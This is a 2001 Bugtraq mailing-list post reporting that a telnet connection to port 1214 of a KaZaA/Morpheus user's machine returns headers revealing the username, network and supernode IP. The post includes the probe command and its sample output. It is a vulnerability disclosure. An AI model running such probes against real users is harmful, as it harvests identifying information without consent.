[22447] in bugtraq

home help back first fref pref prev next nref lref last post

KaZaA / Morpheus Exploit??? (At least a way to get username and such)

daemon@ATHENA.MIT.EDU (Jesse Sunday)
Tue Aug 28 23:55:15 2001

Message-ID: <005401c12ff8$6550e600$9604a8c0@2000sunday>
From: "Jesse Sunday" <jsunday@parview.com>
To: <bugtraq@securityfocus.com>
Date: Tue, 28 Aug 2001 15:34:03 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit



        Using FreeBSD 4.3 I tried the following...



foobar2:~# ping localhost | telnet morpheus.users.ip.address 1214
Trying morpheus.users.ip.address...
Connected to morpheus.users.ip.address.
Escape character is '^]'.
HTTP/1.0 501 Not Implemented
X-Kazaa-Username: {USER NAME HERE}
X-Kazaa-Network: MusicCity
X-Kazaa-IP: morpheus.users.ip.address:1214
X-Kazaa-SupernodeIP: 130.74.237.54:1214

Connection closed by foreign host.
foobar2:~#



           Now I've tried this under W2Ks DOS and it does not produce the
same results...   (It just times out)

Is this of any interest???

Jesse




home help back first fref pref prev next nref lref last post